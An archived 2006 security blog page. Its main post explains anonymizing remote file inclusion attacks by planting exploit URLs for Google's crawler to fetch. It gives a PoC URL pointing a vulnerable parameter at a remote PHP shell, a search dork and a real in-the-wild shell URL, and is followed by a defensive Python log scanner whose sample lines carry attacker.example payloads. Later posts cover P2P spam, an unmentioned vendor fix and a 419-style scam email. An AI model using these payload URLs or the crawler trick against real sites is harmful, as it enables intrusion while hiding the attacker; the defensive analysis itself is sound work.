November 2006

Anonymizing RFI Attacks Through Google

Google can be used to hack into websites, actively exploiting them, as opposed to merely gathering information by way of "Google hacking" (although that is how most of the sites vulnerable to RFI attacks are found in the first place).

by placing a URL on any web page, an attacker gets Google to find it, fetch it and index it. with this mechanism it is possible to anonymize attacks on third-party web sites by routing them through Google's crawler: the target's logs show Googlebot, not the attacker.

PoC:
the attacker constructs a malicious web page containing a URL built from:
1. the URI of the third-party site to attack.
2. the file inclusion exploit (the vulnerable parameter).
3. a second URI pointing at a malicious PHP shell.

example url:
http://victim-site/rfi-exploit?http://uri-with-malicious-code.php

Google will harvest this URL, visit it with its crawler and index the result.
in other words, the crawler requests the target site with exactly the URL it was handed and exploits it unwittingly on behalf of whoever planted it. it's a feature, not a bug.

this is currently exploited in the wild. for example, try searching Google for:
inurl:cmd.gif

and note, as an example, this result:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/cmd.gif?cmd
(the site is no longer vulnerable.) the %20 looks out of place, but that is how the URL appears in the search results.

why use a botnet when one can abuse the Google crawler, which is allowed through on most web sites?
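As an added example (not code from the post), here is the defender's side of this trick in Python: because the request arrives from a real search-engine crawler, the user agent and source address look legitimate, so the only reliable signal is the parameter value itself. The scanner below parses Apache combined-format log lines, percent-decodes each query value and flags any parameter that resolves to an absolute http/https/ftp URL, recording whether the client claimed to be a crawler. The log lines, host names and addresses are constructed for the example; the whitespace-stripping step is an assumption added to catch the "http:/%20/" shape quoted above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache "combined" format). Hosts, paths
# and addresses are hypothetical (RFC 5737 ranges), not taken from the post.
# Line 1 mimics the "http:/%20/" shape seen in the search result, line 4 uses
# a percent-encoded scheme. The crawler line carries a Googlebot user agent
# because that is the whole point: the request looks like an ordinary crawl.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Nov/2006:03:14:07 +0000] "GET /index.php?s=http:/%20/attacker.example/cmd.gif?cmd HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.5 - - [12/Nov/2006:03:15:11 +0000] "GET /index.php?s=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Nov/2006:03:16:40 +0000] "GET /page.php?inc=ftp://attacker.example/shell.txt HTTP/1.1" 200 777 "-" "curl/7.15"
198.51.100.6 - - [12/Nov/2006:03:17:02 +0000] "GET /index.php?s=%68%74%74%70%3a%2f%2fattacker.example/x.txt&page=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
CRAWLER_UA_RE = re.compile(r'googlebot|msnbot|slurp|bingbot', re.IGNORECASE)


def normalize_value(value):
    """Decode a query value once more and drop all whitespace.

    parse_qsl has already percent-decoded once (so "%68%74%74%70" is "http"
    by the time it gets here); the extra unquote catches double encoding.
    Whitespace removal is an assumption made so that "http:/ /host", which is
    what "%20" decodes to, is still recognised as a remote URL.
    """
    return re.sub(r'\s+', '', unquote(value))


def remote_include_params(target):
    """Return [(name, normalized_value)] for every query parameter whose
    value is an absolute http/https/ftp URL, i.e. a candidate remote file
    inclusion. Non-URL values such as "about" or "1" are ignored."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        norm = normalize_value(value)
        if REMOTE_SCHEME_RE.match(norm):
            hits.append((name, norm))
    return hits


def scan_log(text):
    """Parse combined-format lines and report RFI-shaped requests, noting
    whether the client claimed to be a search-engine crawler."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        params = remote_include_params(m['target'])
        if params:
            findings.append({
                'ip': m['ip'],
                'time': m['ts'],
                'ua': m['ua'],
                'via_crawler': bool(CRAWLER_UA_RE.search(m['ua'])),
                'params': params,
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        who = 'crawler' if f['via_crawler'] else 'direct'
        for name, url in f['params']:
            print(f"{f['time']} {f['ip']} ({who}) {name} -> {url}")
```

Run as-is it flags the Googlebot line exactly like the curl one; the via_crawler flag is context for the analyst (the planted URL, not the crawler, is the adversary), never a reason to discard the hit. On the application side the fix is likewise not to filter crawlers but to stop passing user input to include() at all and, where the PHP version offers it, to switch off allow_url_fopen/allow_url_include.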

notes:
1. this attack was verified against Google, but there is no reason it should not work with other search engines, web crawlers and spiders.
2. file inclusions tie in well with this attack anonymizer, but there is no reason other attack types (anything triggered by a single GET request) can't be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.

noam rathaus.
(with thanks to Sun Shine and lev toger)

P2P as a new spam medium, moving from PoC to full operations

spam on P2P networks used to consist mainly of advertising embedded in downloaded movies and pictures (mostly pornographic in nature), and of viruses and other malware hidden in downloaded warez and nearly any other file type (from zip archives to movie files). P2P networks were also used by spammers for address harvesting.
today, P2P has become a direct-to-customer spamvertising medium. this change has been under way for a while; as we speak, it is moving from a proof-of-concept trial to a full spread of spam, day in, day out.
the idea is not new, but now it is becoming serious.

some choice picks:
ebook – googlecash – make money using google (learn to use affiliate programs to make easy money).pdf [i’ve been made aware this one is a real, yet pirated, book. call it a false positive]
us banks acounts information [dir]
how to create an automated ebay money machine.pdf
easy chair millionaire review.pdf
press equalizer review – flood your site with targeted traffic, achieve top rankings and gain dozens or more backlinks.pdf
top home based jobs [dir]

and so on. these are just some of the scams now being pushed over P2P.

we discussed this before. it started with fake books on the subject of online marketing, and it has now gone all the way to spammers, phishers, "affiliate programs" and spyware vendors (in other words, the organized crime groups behind online fraud) looking for new mediums through which to reach their target audience, as email becomes more and more scrutinized and filtered.

FunnySad side of security

Reading through Zero Day Initiative's (ZDI) advisory, Verity Ultraseek Request Proxying Vulnerability, I noticed that it says of the vendor:

Verity has issued an update to correct this vulnerability. More details can be found at: http://www.ultraseek.com/support/docs/RELNOTES.txt

but going to the release notes you can quickly see that there is no mention of this vulnerability, nor do the words Security or Vulnerability appear anywhere in the release notes.

This could mean one of two things: ZDI's advisory is incorrect, or Ultraseek decided to hide the fact that the vulnerability ever existed. I am assuming the latter.

This is of course saddening: no user of Ultraseek reading the release notes will ever know the problem existed, unless they look up ZDI's advisory.

Food for thought…

419 French (Polite) Spam

I got this polite spam, which is a French version of the infamous Nigerian 419 (if that's what it is; it lacks a dead relative):

Hello,
Allow me to introduce myself: I am Madame Delanoë, the direct collaborator of Annie Dupas, 2006 gold star of clairvoyance.

I am contacting you because you have been selected in a draw and have the chance to benefit from a completely free clairvoyance reading by e-mail with Annie Dupas.